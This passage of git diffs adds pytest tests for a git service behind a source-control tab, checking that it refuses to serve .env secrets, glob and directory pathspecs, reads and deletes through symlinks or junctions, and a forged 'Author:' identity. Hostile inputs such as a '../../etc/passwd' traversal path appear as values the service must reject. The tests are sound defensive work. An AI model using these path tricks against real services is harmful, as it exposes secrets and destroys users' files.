+    repo.git("add", "-A", "--", "a.txt")
+    repo.write("a.txt", "on disk\n")
+
+    service = repo.service
+    assert (await service.file_at_ref("a.txt", "HEAD")).text == "one\ntwo\n"
+    assert (await service.file_at_ref("a.txt", "index")).text == "staged\n"
+    assert (await service.file_at_ref("a.txt", "worktree")).text == "on disk\n"
+    assert (await service.file_at_ref("a.txt", first)).text == "one\ntwo\n"
+
+
+async def test_a_file_that_is_not_at_that_ref_is_a_404(repo):
+    repo.write("new.txt", "new\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("new.txt", "HEAD")
+
+    assert _error(excinfo).code == "not_found"
+    assert _error(excinfo).status == 404
+
+
+async def test_a_binary_file_comes_back_as_a_flag_not_as_mojibake(repo):
+    data = b"\x89PNG\r\n\x1a\n" + bytes(range(256))
+    repo.write_bytes("logo.png", data)
+    repo.git("add", "-A", "--", ".")
+    repo.git("commit", "-q", "-m", "a png")
+
+    content = await repo.service.file_at_ref("logo.png", "HEAD")
+
+    assert content.binary is True
+    assert content.text == ""
+    assert content.size == len(data)
+
+
+async def test_a_file_past_the_cap_is_cut_and_says_how_big_it_was(
+        repo, monkeypatch):
+    """``size`` is what git HAD, before the cut -- so a truncated response
+    can still say what it truncated. The cap is patched down rather than fed
+    two megabytes, which tests the same three lines in a tenth of a second.
+    """
+    monkeypatch.setattr(diff_ops, "MAX_FILE_BYTES", 8)
+    repo.commit("a long file", {"long.txt": "0123456789abcdef\n"})
+
+    content = await repo.service.file_at_ref("long.txt", "HEAD")
+
+    assert content.truncated is True
+    assert content.text == "01234567"
+    assert content.size == 17
+
+
+async def test_a_worktree_read_of_an_untracked_file_is_allowed(repo):
+    """It is part of the project the moment git lists it as untracked."""
+    repo.write("new.txt", "new\n")
+
+    assert (await repo.service.file_at_ref("new.txt", "worktree")).text == "new\n"
+
+
+async def test_a_worktree_read_of_an_ignored_file_is_refused(repo):
+    """``.gitignore`` is where a project says which files are not part of
+    it; a read endpoint that serves them anyway makes that meaningless."""
+    repo.write(".gitignore", ".env\nsecrets/\n")
+    repo.write("secrets/token.txt", "hunter2\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("secrets/token.txt", "worktree")
+
+    assert _error(excinfo).code == "ignored"
+    assert _error(excinfo).status == 403
+
+
+async def test_a_worktree_read_of_a_file_git_has_never_heard_of_is_a_404(repo):
+    """Not tracked, not in the status: there is nothing to serve."""
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("nowhere.txt", "worktree")
+
+    assert _error(excinfo).code == "not_found"
+
+
+@pytest.mark.parametrize("ref", ["HEAD", "index", "worktree"])
+async def test_a_dotenv_file_is_refused_at_every_ref(repo, ref):
+    """A secret that was committed once is in every later tree, and
+    ``.gitignore`` does not un-commit it. So the guard is on the READ."""
+    repo.write(".gitignore", "# nothing is ignored here\n")
+    repo.commit("commit the secret", {".env": "OPENAI_API_KEY=sk-secret\n"})
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref(".env", ref)
+
+    assert _error(excinfo).code == "ignored"
+    assert _error(excinfo).status == 403
+
+
+async def test_a_dotenv_file_is_refused_by_the_diff_too(repo):
+    repo.write(".gitignore", "# nothing is ignored here\n")
+    repo.commit("commit the secret", {".env": "OPENAI_API_KEY=sk-secret\n"})
+    repo.write(".env", "OPENAI_API_KEY=sk-newer\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff(".env", "worktree")
+
+    assert _error(excinfo).code == "ignored"
+
+
+async def test_a_dotenv_example_is_not_a_secret(repo):
+    """It exists to be read: it is the committed template of the keys a
+    project needs."""
+    repo.commit("template", {".env.example": "OPENAI_API_KEY=\n"})
+
+    content = await repo.service.file_at_ref(".env.example", "HEAD")
+
+    assert content.text == "OPENAI_API_KEY=\n"
+
+
+async def test_a_path_outside_the_project_never_reaches_git(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("../../etc/passwd", "worktree")
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+# --- identity ---------------------------------------------------------------
+
+
+async def test_an_unset_identity_is_reported_as_unset(repo):
+    """The isolated config has no ``[user]`` section, and the environment
+    identity these tests commit with is not a CONFIGURED one -- which is
+    exactly the state the tab has to offer to fix."""
+    identity = await repo.service.identity()
+
+    assert identity.name is None and identity.name_scope is None
+
+
+async def test_a_global_identity_is_reported_as_global(repo, isolated_git):
+    isolated_git.write_text(
+        "[user]\n\tname = Global Person\n\temail = person@example.com\n",
+        encoding="utf-8")
+
+    identity = await repo.service.identity()
+
+    assert identity.name == "Global Person"
+    assert identity.name_scope == "global"
+    assert identity.email_scope == "global"
+
+
+async def test_writing_an_identity_writes_it_locally(repo, isolated_git):
+    isolated_git.write_text("[user]\n\tname = Global Person\n",
+                            encoding="utf-8")
+
+    result = await repo.service.set_identity(name="Local Person",
+                                             email="local@example.com")
+
+    assert result.detail == {"name": "Local Person",
+                            "email": "local@example.com"}
+    identity = await repo.service.identity()
+    assert identity.name == "Local Person"
+    assert identity.name_scope == "local"
+    # The user's own config is untouched: this only ever writes --local.
+    assert "Global Person" in isolated_git.read_text(encoding="utf-8")
+    assert "Local Person" not in isolated_git.read_text(encoding="utf-8")
+
+
+async def test_an_identity_that_would_forge_a_header_is_refused(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.set_identity(name="Someone\nAuthor: nobody")
+
+    assert _error(excinfo).code == "invalid_value"
+
+
+# --- the mutation lock ------------------------------------------------------
+
+
+async def test_a_second_mutation_while_one_runs_is_refused(repo):
+    """git serialises writes with the index lock and answers the loser with
+    a sentence about ``.git/index.lock``. This is the same refusal, in a
+    shape the tab can show: nothing was attempted, and the operation that
+    holds the lock is named.
+
+    The parked operation waits on a ``threading.Event`` and not an
+    ``asyncio`` one because ``mutate`` runs it on a worker thread -- which
+    is the point of the test: the loop is free the whole time.
+    """
+    started = threading.Event()
+    release = threading.Event()
+
+    def parked(root):
+        started.set()
+        assert release.wait(10), "the parked mutation was never released"
+        return {}
+
+    service = repo.service
+    running = asyncio.create_task(
+        service.mutate("parked", parked, worktree=False))
+    await asyncio.to_thread(started.wait, 10)
+
+    try:
+        with pytest.raises(GitBusy) as excinfo:
+            await service.stage(all_paths=True)
+        assert excinfo.value.op == "parked"
+        assert excinfo.value.code == "busy"
+        assert excinfo.value.status == 409
+    finally:
+        release.set()
+        await running
+
+    # The lock is free again, and the service is not stuck saying "busy".
+    assert service.current_op is None
+    await service.stage(all_paths=True)
+
+
+async def test_a_write_that_cannot_be_read_back_is_a_failed_request(
+        repo, monkeypatch):
+    """``MutationResult.status`` is required, and this is what makes that
+    true: the tab is never handed a result with a hole where the status
+    should be, so it never has to decide what to draw for one."""
+    from app.core.git import service as service_module
+
+    def _broken(root):
+        raise GitError("git_failed", 500, "the status could not be read")
+
+    monkeypatch.setattr(service_module.repo, "read_status", _broken)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.mutate("noop", lambda root: {}, worktree=False)
+
+    assert _error(excinfo).code == "git_failed"
+
+
+async def test_a_read_never_waits_for_the_lock(repo):
+    """A status poll while a commit runs the user's hooks must not queue."""
+    started = threading.Event()
+    release = threading.Event()
+
+    def parked(root):
+        started.set()
+        assert release.wait(10)
+        return {}
+
+    service = repo.service
+    running = asyncio.create_task(
+        service.mutate("parked", parked, worktree=False))
+    await asyncio.to_thread(started.wait, 10)
+
+    try:
+        response = await asyncio.wait_for(service.status(), 10)
+        assert response.repo.state == "ready"
+    finally:
+        release.set()
+        await running
+
+
+# --- the plain functions, called the way a route never would ----------------
+
+
+def test_the_operations_work_without_a_service(repo):
+    """Every op is a function of a root: no loop, no lock, no service."""
+    repo.write("a.txt", "edited\n")
+    repo.write("new.txt", "new\n")
+
+    assert stage_paths(repo.root, ["a.txt"]) == {"paths": ["a.txt"]}
+    assert unstage_paths(repo.root, ["a.txt"]) == {"paths": ["a.txt"]}
+    assert discard_paths(repo.root, ["new.txt"])["removed"] == 1
+    detail = commit_changes(repo.root, "direct", all_paths=True)
+    assert detail["sha"] == repo.head()
+
+
+def test_changed_paths_reports_what_a_commit_swallowed(repo):
+    """When HEAD moves, the status difference is not the whole story: the
+    files that went INTO the commit are gone from every group."""
+    before = repo_ops.read_status(repo.root)
+    repo.commit("second", {"a.txt": "changed\n"})
+    after = repo_ops.read_status(repo.root)
+
+    assert changed_paths(repo.root, before, after) == ["a.txt"]
+
+
+def test_a_branch_name_git_would_refuse_is_refused(repo):
+    with pytest.raises(GitError) as excinfo:
+        check_ref_format(repo.root, "bad..name")
+
+    assert _error(excinfo).code == "invalid_ref"
+
+
+def test_a_branch_name_that_is_an_option_is_refused_before_git_sees_it(repo):
+    """git ACCEPTS ``refs/heads/-x`` (measured, exit 0). On a command line
+    ``-x`` is an option, so the regex is the defence, not git."""
+    accepted = subprocess.run(
+        ["git", "-C", str(repo.root), "check-ref-format", "refs/heads/-x"],
+        capture_output=True)
+    assert accepted.returncode == 0, "git changed its mind about a leading -"
+
+    with pytest.raises(GitError) as excinfo:
+        check_ref_format(repo.root, "-x")
+
+    assert _error(excinfo).code == "invalid_ref"
+
+
+def test_a_branch_name_git_accepts_comes_back_unchanged(repo):
+    assert check_ref_format(repo.root, "feat/source-control") == (
+        "feat/source-control")
+
+
+def test_resolve_repo_is_a_plain_function_of_a_directory(repo, tmp_path):
+    """The service injects it; nothing about it needs a service."""
+    assert resolve_repo(repo.root).state == "ready"
+    assert resolve_repo(None).state == "no_project"
+    assert resolve_repo(tmp_path / "gone").state == "not_repo"
+
+
+def test_the_status_read_is_the_same_one_every_module_uses(repo):
+    """One reader, so a diff, a discard and a poll cannot disagree about
+    what is untracked."""
+    repo.write("new.txt", "new\n")
+
+    status = repo_ops.read_status(repo.root)
+
+    assert [entry.path for entry in status.untracked] == ["new.txt"]
+    assert status.branch == "main"
+    assert status.head == repo.head()

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -403,6 +403,49 @@ async def test_init_leaves_a_gitignore_that_already_hides_env_alone(tmp_path):
     assert (root / ".gitignore").read_bytes() == b"# mine\n.env\n*.log\n"
 
 
+@pytest.mark.parametrize("existing", [
+    pytest.param("/.env\n", id="anchored-to-the-root"),
+    pytest.param(".env/\n", id="written-as-a-directory"),
+    pytest.param(".env   \n", id="trailing-spaces"),
+    pytest.param(".env  # secrets\n", id="trailing-comment"),
+    pytest.param("*.pyc\n/.env/   # keys\n", id="all-of-it-at-once"),
+])
+async def test_init_reads_the_other_ways_people_write_the_env_line(
+        tmp_path, existing):
+    """A second ``.env`` under somebody's own reads as a bug in the tab.
+
+    Two of these spellings do not really ignore a FILE called ``.env`` --
+    git matches ``.env/`` against directories only, and ``#`` opens a
+    comment just in the first column. They still count, because the promise
+    here is not to touch a file whose author has already written about
+    ``.env`` in it.
+    """
+    root = tmp_path / "fresh"
+    root.mkdir()
+    (root / ".gitignore").write_bytes(existing.encode("utf-8"))
+
+    result = await GitService(project_dir=lambda: root).init()
+
+    assert (root / ".gitignore").read_bytes() == existing.encode("utf-8")
+    assert result.detail["scaffold"] == [".gitattributes"]
+
+
+async def test_init_still_hides_env_next_to_an_un_ignore_rule(tmp_path):
+    """``!.env`` is the one spelling that must NOT count as present.
+
+    It is a rule to COMMIT the file this whole scaffold exists to keep out
+    of history, and the appended line comes after it, which is what makes it
+    win.
+    """
+    root = tmp_path / "fresh"
+    root.mkdir()
+    (root / ".gitignore").write_bytes(b"!.env\n")
+
+    await GitService(project_dir=lambda: root).init()
+
+    assert (root / ".gitignore").read_bytes() == b"!.env\n\n.env\n"
+
+
 async def test_init_never_rewrites_an_existing_gitattributes(tmp_path):
     """Its rules decide how git stores every file; ours are a default, not
     a correction."""
@@ -1394,6 +1437,88 @@ async def test_an_ordinary_file_beside_a_link_still_reads(repo):
 
     assert (await repo.service.file_at_ref("plain.txt",
                                            "worktree")).text == "ordinary\n"
+
+
+async def test_a_discard_through_a_linked_folder_leaves_the_real_file(repo):
+    """Measured, and the reason the write side has a guard at all.
+
+    Every check before it passes and is right to: ``notes/keys.txt`` is
+    relative, holds no ``..``, and RESOLVES inside the project -- which is
+    exactly what a link to another folder of the same project does. ``clean
+    -f`` down it then deleted the real file, and the request that did it
+    looked like an ordinary discard of an untracked file.
+    """
+    repo.write("secrets/keys.txt", f"{SECRET}\n")
+    _link(repo.root / "secrets", repo.root / "notes")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.discard(["notes/keys.txt"])
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "link" in (_error(excinfo).hint or "")
+    assert (repo.root / "secrets" / "keys.txt").read_text(
+        encoding="utf-8") == f"{SECRET}\n"
+
+
+@pytest.mark.skipif(sys.platform != "win32", reason="junctions are Windows'")
+async def test_a_discard_through_a_junction_leaves_the_real_file(repo):
+    """The Windows half: ``is_symlink`` answers False for a junction, so
+    only the resolved-against-lexical comparison sees this one."""
+    repo.write("secrets/keys.txt", f"{SECRET}\n")
+    made = subprocess.run(
+        ["cmd", "/c", "mklink", "/J", str(repo.root / "notes"),
+         str(repo.root / "secrets")], capture_output=True)
+    if made.returncode != 0:
+        pytest.skip("this box would not create a junction")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.discard(["notes/keys.txt"])
+
+    assert _error(excinfo).code == "invalid_path"
+    assert (repo.root / "secrets" / "keys.txt").read_text(
+        encoding="utf-8") == f"{SECRET}\n"
+
+
+@pytest.mark.parametrize("write", ["stage", "unstage"])
+async def test_the_other_two_writes_refuse_a_linked_parent_too(repo, write):
+    """One guard, all three writes: ``add -A`` and ``rm --cached`` down a
+    link put somebody else's file in this repository's index."""
+    repo.write("secrets/keys.txt", f"{SECRET}\n")
+    _link(repo.root / "secrets", repo.root / "notes")
+
+    with pytest.raises(GitError) as excinfo:
+        await getattr(repo.service, write)(["notes/keys.txt"])
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+async def test_discarding_a_tracked_symlink_file_itself_still_works(repo):
+    """The FINAL component may be a link, and refusing it would be a bug.
+
+    git stores a symlink as an ordinary blob holding the path it points at,
+    so restoring one is not a read THROUGH it -- and a tab that cannot
+    discard a change to a link cannot manage a repository that has one.
+    """
+    repo.write("a.txt", "one\n")
+    repo.write("b.txt", "two\n")
+    _link(repo.root / "a.txt", repo.root / "link.txt")
+    repo.commit("track the link")
+    (repo.root / "link.txt").unlink()
+    _link(repo.root / "b.txt", repo.root / "link.txt")
+
+    result = await repo.service.discard(["link.txt"])
+
+    assert result.detail["restored"] == 1
+    assert repo.git("status", "--porcelain", "--", "link.txt").strip() == ""
+
+
+async def test_a_write_to_a_path_under_an_ordinary_folder_is_not_refused(repo):
+    """The positive control: a parent that is a real directory is fine."""
+    repo.write("sub/new.txt", "new\n")
+
+    result = await repo.service.stage(["sub/new.txt"])
+
+    assert result.detail["paths"] == ["sub/new.txt"]
 
 
 # --- a file in a conflict is still a file ------------------------------------

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -964,6 +964,22 @@ async def test_the_added_side_of_a_diff_is_missing_not_empty(repo):
     assert response.new_text == "new\n"
 
 
+async def test_an_index_diff_before_the_first_commit_shows_the_file_as_added(
+        make_repo):
+    """The first thing a user does in a fresh repository: stage a file and
+    click it. There is no HEAD to compare against, so git compares the index
+    with the empty tree -- and the old side is missing rather than empty."""
+    repo = make_repo(first_commit=False)
+    repo.write("a.txt", "one\n")
+    repo.git("add", "-A", "--", "a.txt")
+
+    response = await repo.service.diff("a.txt", "index", blobs=True)
+
+    assert "+one" in response.patch
+    assert response.old_missing is True and response.old_text is None
+    assert response.new_text == "one\n"
+
+
 async def test_an_unknown_diff_scope_is_refused(repo):
     with pytest.raises(GitError) as excinfo:
         await repo.service.diff("a.txt", "everything")

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -432,6 +432,15 @@ async def test_init_reads_the_other_ways_of_really_ignoring_env(
     pytest.param(".env  # secrets\n", id="what-looks-like-a-comment"),
     pytest.param("  .env\n", id="indented-with-spaces"),
     pytest.param("\t.env\n", id="indented-with-a-tab"),
+    # Trailing whitespace that is not a SPACE. git drops spaces and nothing
+    # else, so each of these is a pattern for a file whose name ends in that
+    # character -- measured on git 2.53, ``.env`` stays untracked under all
+    # four -- and a check that stripped them would leave the real rule
+    # unwritten.
+    pytest.param(".env\t\n", id="trailing-tab"),
+    pytest.param(".env\t \n", id="trailing-tab-then-space"),
+    pytest.param(".env\xa0\n", id="trailing-non-breaking-space"),
+    pytest.param("/.env\t\n", id="anchored-with-a-trailing-tab"),
     pytest.param("*.pyc\n/.env/   # keys\n", id="both-mistakes-at-once"),
     # ``!.env`` has its own test below: it is a near-miss for a different
     # reason, and the reason is what makes it worth naming.
@@ -443,12 +452,15 @@ async def test_init_appends_when_the_line_only_looks_like_it_ignores_env(
 
     ``.env/`` matches a DIRECTORY and never a file; ``.gitignore`` has no
     trailing comments, so ``.env  # secrets`` is a pattern matching a file
-    with that whole name; and git keeps LEADING whitespace, so ``  .env``
-    is a pattern for a file whose name starts with two spaces (measured:
-    ``git check-ignore -v -- .env`` exits 1 against it). Whoever wrote any
-    of them believes their secrets are ignored and they are not -- and a
-    duplicate line costs nothing, while a missing one is the API keys this
-    scaffold exists to keep out.
+    with that whole name; git keeps LEADING whitespace, so ``  .env`` is a
+    pattern for a file whose name starts with two spaces; and the only
+    TRAILING whitespace it drops is spaces, so a tab or a non-breaking
+    space at the end is part of the name too (all measured on git 2.53:
+    ``git check-ignore -v -- .env`` exits 1 against every one of them and
+    the file shows as ``?? .env``). Whoever wrote any of them believes
+    their secrets are ignored and they are not -- and a duplicate line
+    costs nothing, while a missing one is the API keys this scaffold exists
+    to keep out.
     """
     root = tmp_path / "fresh"
     root.mkdir()

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -607,6 +607,43 @@ async def test_discard_all_never_deletes_an_ignored_env(repo):
     assert result.status.unstaged == [] and result.status.untracked == []
 
 
+async def test_discard_all_before_the_first_commit_still_cleans(tmp_path):
+    """The state every new repository starts in.
+
+    ``restore --worktree -- .`` fails on an empty index -- "pathspec '.' did
+    not match any file(s) known to git", which reads as a 404 -- and the
+    clean after it never ran, so "discard everything" answered with an error
+    and left the files where they were.
+    """
+    root = tmp_path / "fresh"
+    root.mkdir()
+    service = GitService(project_dir=lambda: root)
+    await service.init()
+    (root / "scratch.txt").write_text("temporary\n", encoding="utf-8")
+
+    result = await service.discard(all_paths=True)
+
+    assert not (root / "scratch.txt").exists()
+    assert result.status.untracked == []
+    assert result.status.unstaged == []
+    assert result.status.unborn is True
+
+
+async def test_discard_all_before_the_first_commit_restores_a_staged_edit(
+        make_repo):
+    """...and the restore still happens when there IS something in the index:
+    an unborn branch can have a file staged and then edited again."""
+    repo = make_repo(first_commit=False)
+    repo.write("x.txt", "staged\n")
+    repo.git("add", "-A", "--", "x.txt")
+    repo.write("x.txt", "edited after staging\n")
+
+    result = await repo.service.discard(all_paths=True)
+
+    assert repo.read("x.txt") == "staged\n"
+    assert result.status.unstaged == []
+
+
 async def test_discard_refuses_a_submodule(repo):
     """``restore --worktree`` on a gitlink succeeds and does nothing at all
     (measured on git 2.53), so the tab would report a discard that did not
@@ -978,6 +1015,129 @@ async def test_an_index_diff_before_the_first_commit_shows_the_file_as_added(
     assert "+one" in response.patch
     assert response.old_missing is True and response.old_text is None
     assert response.new_text == "one\n"
+
+
+# --- a path is one file, never a pattern and never a directory --------------
+
+#: What must never come back through a read route, whatever was asked for.
+SECRET = "OPENAI_API_KEY=sk-DO-NOT-LEAK"
+
+
+@pytest.fixture
+def secretive(make_repo) -> Repo:
+    """A repository with a committed ``.env`` at the root and one in a folder.
+
+    Committed deliberately -- ``.gitignore`` is emptied first -- because that
+    is the case the guard exists for: a secret that was committed once is in
+    every later tree, and no later ignore rule takes it back out.
+    """
+    repo = make_repo()
+    repo.write(".gitignore", "# nothing is ignored here\n")
+    repo.commit("commit the secrets", {
+        ".env": f"{SECRET}\n",
+        "sub/.env": f"{SECRET}\n",
+        "sub/notes.txt": "public\n"})
+    # A worktree edit, so a worktree diff would have something to show.
+    repo.write(".env", f"{SECRET}-NEWER\n")
+    repo.write("sub/.env", f"{SECRET}-NEWER\n")
+    return repo
+
+
+@pytest.mark.parametrize("scope", ["worktree", "index", "commit"])
+@pytest.mark.parametrize("path", [
+    pytest.param("sub", id="a-directory"),
+    pytest.param("sub/", id="a-directory-with-a-slash"),
+    pytest.param("*", id="everything"),
+    pytest.param("*env", id="glob-suffix"),
+    pytest.param(".en?", id="glob-single-character"),
+    pytest.param("[.]env", id="glob-character-class"),
+    pytest.param(".", id="the-root"),
+])
+async def test_a_pathspec_that_is_not_one_file_never_returns_a_secret(
+        secretive, path, scope):
+    """The guard checks a NAME; git used to be free to expand it.
+
+    Every string here is a pathspec that matches ``.env`` or a directory
+    containing one, while passing a check on its own final segment --
+    ``[.]env`` is not a dotenv filename, it is a pattern that matches one.
+    Two things now stop it: ``--literal-pathspecs`` in the runner's fixed
+    prefix (a path is a name), and the requirement that a diff names exactly
+    one file in the scope it asks about.
+
+    Refused, or a 200 that does not contain the secret. Nothing else.
+    """
+    sha = secretive.head() if scope == "commit" else None
+
+    try:
+        response = await secretive.service.diff(path, scope, sha=sha,
+                                                blobs=True)
+    except GitError as exc:
+        assert exc.code in ("invalid_path", "not_found", "ignored")
+        return
+
+    assert SECRET not in response.patch
+    assert SECRET not in (response.old_text or "")
+    assert SECRET not in (response.new_text or "")
+
+
+@pytest.mark.parametrize("scope", ["worktree", "index", "commit"])
+async def test_a_directory_diff_says_to_ask_for_one_file(secretive, scope):
+    """The specific answer for the specific mistake, in every scope."""
+    sha = secretive.head() if scope == "commit" else None
+
+    with pytest.raises(GitError) as excinfo:
+        await secretive.service.diff("sub", scope, sha=sha)
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "one file" in (_error(excinfo).hint or "")
+
+
+async def test_an_ordinary_file_in_a_folder_still_diffs(secretive):
+    """The positive control: the single-file rule must not refuse real work."""
+    secretive.write("sub/notes.txt", "public\nedited\n")
+
+    response = await secretive.service.diff("sub/notes.txt", "worktree")
+
+    assert "+edited" in response.patch
+
+
+@pytest.mark.parametrize("path", [".env/x", "sub/.env/y", ".env.local/x"])
+async def test_a_path_inside_a_dotenv_directory_is_refused(repo, path):
+    """One file of secrets per environment is a directory called ``.env``,
+    so the guard reads EVERY segment and not only the last."""
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref(path, "worktree")
+
+    assert _error(excinfo).code == "ignored"
+    assert _error(excinfo).status == 403
+
+
+async def test_a_glob_never_stages_more_than_the_file_it_names(repo):
+    """``a[1].txt`` is a character class matching ``a1.txt``.
+
+    The same property as ``git add -- '*'`` meaning the whole tree, in the
+    only spelling that can be tested on every platform: Windows cannot hold
+    a file named ``*``, but ``[`` and ``]`` are ordinary characters there.
+    """
+    repo.write("a1.txt", "matched by the pattern\n")
+    repo.write("a[1].txt", "the file that was asked for\n")
+
+    result = await repo.service.stage(["a[1].txt"])
+
+    assert [entry.path for entry in result.status.staged] == ["a[1].txt"]
+    assert [entry.path for entry in result.status.untracked] == ["a1.txt"]
+
+
+async def test_staging_a_star_is_not_staging_everything(repo):
+    """``git add -A -- '*'`` without ``--literal-pathspecs`` is "stage the
+    whole tree" wearing a pathspec's clothes."""
+    repo.write("new.txt", "new\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.stage(["*"])
+
+    assert _error(excinfo).code == "not_found"
+    assert (await repo.service.status()).status.staged == []
 
 
 async def test_an_unknown_diff_scope_is_refused(repo):

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -732,6 +732,30 @@ async def test_discard_all_before_the_first_commit_restores_a_staged_edit(
     assert result.status.unstaged == []
 
 
+async def test_discard_all_during_a_conflict_restores_what_it_can(repo):
+    """One unmerged file used to make "discard everything" do nothing.
+
+    ``restore --worktree -- .`` exits 1 with "error: path 'a.txt' is
+    unmerged" the moment a conflict sits beside an ordinary modification
+    (measured on git 2.53) -- and it restores NOTHING before it does, so
+    the whole request answered 500 with every change still in place. The
+    pathspec cannot say "all but the unmerged ones", so the restore names
+    the unstaged files instead; an unmerged path is not one of them.
+    """
+    repo.commit("a second tracked file", {"b.txt": "b\n"})
+    _conflicted(repo)
+    repo.write("b.txt", "modified\n")
+
+    result = await repo.service.discard(all_paths=True)
+
+    assert repo.read("b.txt") == "b\n"
+    # The conflict is left exactly as it was: resolving it is the user's
+    # job, and a discard that silently picked a side would be the worst
+    # possible help.
+    assert [entry.path for entry in result.status.conflicted] == ["a.txt"]
+    assert "<<<<<<<" in repo.read("a.txt")
+
+
 async def test_discard_refuses_a_submodule(repo):
     """``restore --worktree`` on a gitlink succeeds and does nothing at all
     (measured on git 2.53), so the tab would report a discard that did not

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -547,6 +547,24 @@ async def test_stage_all_takes_the_whole_tree(repo):
     assert sorted(entry.path for entry in result.status.staged) == [
         "a.txt", "dir/new.txt"]
     assert result.status.unstaged == []
+    # Present even when nothing was left out, so the tab reads one shape.
+    assert result.detail["skipped"] == []
+
+
+async def test_stage_all_marks_a_resolved_conflict(repo):
+    """"Stage All" in the middle of a merge means "these are resolved".
+
+    A conflicted path is in the list the whole-tree form builds because
+    ``add`` is how a resolution is marked; leaving it out would make the
+    button do nothing on the one file the user is actually working on.
+    """
+    _conflicted(repo)
+    repo.write("a.txt", "resolved by hand\n")
+
+    result = await repo.service.stage(all_paths=True)
+
+    assert result.status.conflicted == []
+    assert [entry.path for entry in result.status.staged] == ["a.txt"]
 
 
 async def test_stage_includes_a_deletion(repo):
@@ -1385,16 +1403,34 @@ async def test_reading_a_folder_at_a_ref_is_a_400_not_a_500(repo):
 # --- a link is a path to somewhere else -------------------------------------
 
 
-def _link(target: Path, link: Path) -> None:
+def _link(target: Path, link: Path, *, directory: bool = False) -> None:
     """Make a symlink, or skip the test on a machine that will not.
 
     Windows needs Developer Mode or an elevated process to create one; Linux
     CI always can, so the tests below run there whatever this box says.
+    ``directory`` is Windows' distinction: a link to a folder has to be
+    created as one, and POSIX ignores the flag.
     """
     try:
-        os.symlink(target, link)
+        os.symlink(target, link, target_is_directory=directory)
     except (OSError, NotImplementedError) as exc:
         pytest.skip(f"this OS would not create a symbolic link: {exc}")
+
+
+def _junction_or_skip(link: Path, target: Path) -> None:
+    """Make a Windows junction, or skip: not every box allows one."""
+    made = subprocess.run(["cmd", "/c", "mklink", "/J", str(link), str(target)],
+                          capture_output=True)
+    if made.returncode != 0:
+        pytest.skip("this box would not create a junction")
+
+
+def _folder_outside(tmp_path: Path) -> Path:
+    """A folder with a secret in it that is NOT part of the project."""
+    outside = tmp_path / "outside"
+    outside.mkdir(exist_ok=True)
+    (outside / "keys.txt").write_text(f"{SECRET}\n", encoding="utf-8")
+    return outside
 
 
 async def test_a_worktree_read_never_follows_a_symbolic_link(repo):
@@ -1584,6 +1620,99 @@ async def test_the_other_two_writes_refuse_a_linked_parent_too(repo, write):
         await getattr(repo.service, write)(["notes/keys.txt"])
 
     assert _error(excinfo).code == "invalid_path"
+
+
+@pytest.mark.skipif(sys.platform != "win32", reason="junctions are Windows'")
+async def test_stage_all_skips_what_a_junction_reaches_and_says_so(repo,
+                                                                   tmp_path):
+    """"All" is not a different kind of consent from naming the file.
+
+    Measured on Windows: with ``notes`` a junction to a folder OUTSIDE the
+    project, ``git status --untracked-files=all`` lists ``notes/keys.txt``
+    and ``git add -A -- .`` stages it -- somebody else's file, in this
+    repository's index, from the one button whose per-path form refuses
+    exactly that write. The whole-tree form now names what it stages, so
+    the same guard sees it; what it leaves out it reports.
+    """
+    outside = _folder_outside(tmp_path)
+    _junction_or_skip(repo.root / "notes", outside)
+
+    result = await repo.service.stage(all_paths=True)
+
+    assert result.status.staged == []
+    assert result.detail["skipped"] == ["notes/keys.txt"]
+    assert (outside / "keys.txt").read_text(encoding="utf-8") == f"{SECRET}\n"
+
+
+@pytest.mark.skipif(sys.platform != "win32", reason="junctions are Windows'")
+async def test_discard_all_removes_a_junction_and_leaves_its_target(repo,
+                                                                    tmp_path):
+    """The destructive half stays a whole-tree ``clean -fd -- .``.
+
+    That is safe in a way ``add`` is not: git removes the LINK and never
+    what it points at (measured, both shapes). Naming the untracked files
+    instead would leave every dangling junction where it was, which is not
+    what "discard everything" means.
+    """
+    outside = _folder_outside(tmp_path)
+    _junction_or_skip(repo.root / "notes", outside)
+
+    await repo.service.discard(all_paths=True)
+
+    assert not (repo.root / "notes").exists()
+    assert (outside / "keys.txt").read_text(encoding="utf-8") == f"{SECRET}\n"
+
+
+async def test_stage_all_stages_a_symlinked_folder_but_nothing_under_it(
+        repo, tmp_path):
+    """The other shape, and it needs no skipping: git does not descend one.
+
+    A symbolic link to a directory is listed as ONE untracked entry and
+    stored as a blob holding the path it points at, so "stage everything"
+    stages the link and never the files at the other end of it. Nothing is
+    skipped because nothing under it was ever offered -- which is why the
+    junction, where git DOES descend, is the shape the filter exists for.
+    """
+    outside = _folder_outside(tmp_path)
+    _link(outside, repo.root / "notes", directory=True)
+
+    result = await repo.service.stage(all_paths=True)
+
+    staged = [entry.path for entry in result.status.staged]
+    assert staged == ["notes"]
+    assert not any(path.startswith("notes/") for path in staged)
+    assert (outside / "keys.txt").read_text(encoding="utf-8") == f"{SECRET}\n"
+
+
+async def test_discard_all_removes_a_symlinked_folder_and_keeps_its_target(
+        repo, tmp_path):
+    outside = _folder_outside(tmp_path)
+    _link(outside, repo.root / "notes", directory=True)
+
+    await repo.service.discard(all_paths=True)
+
+    assert not os.path.lexists(repo.root / "notes")
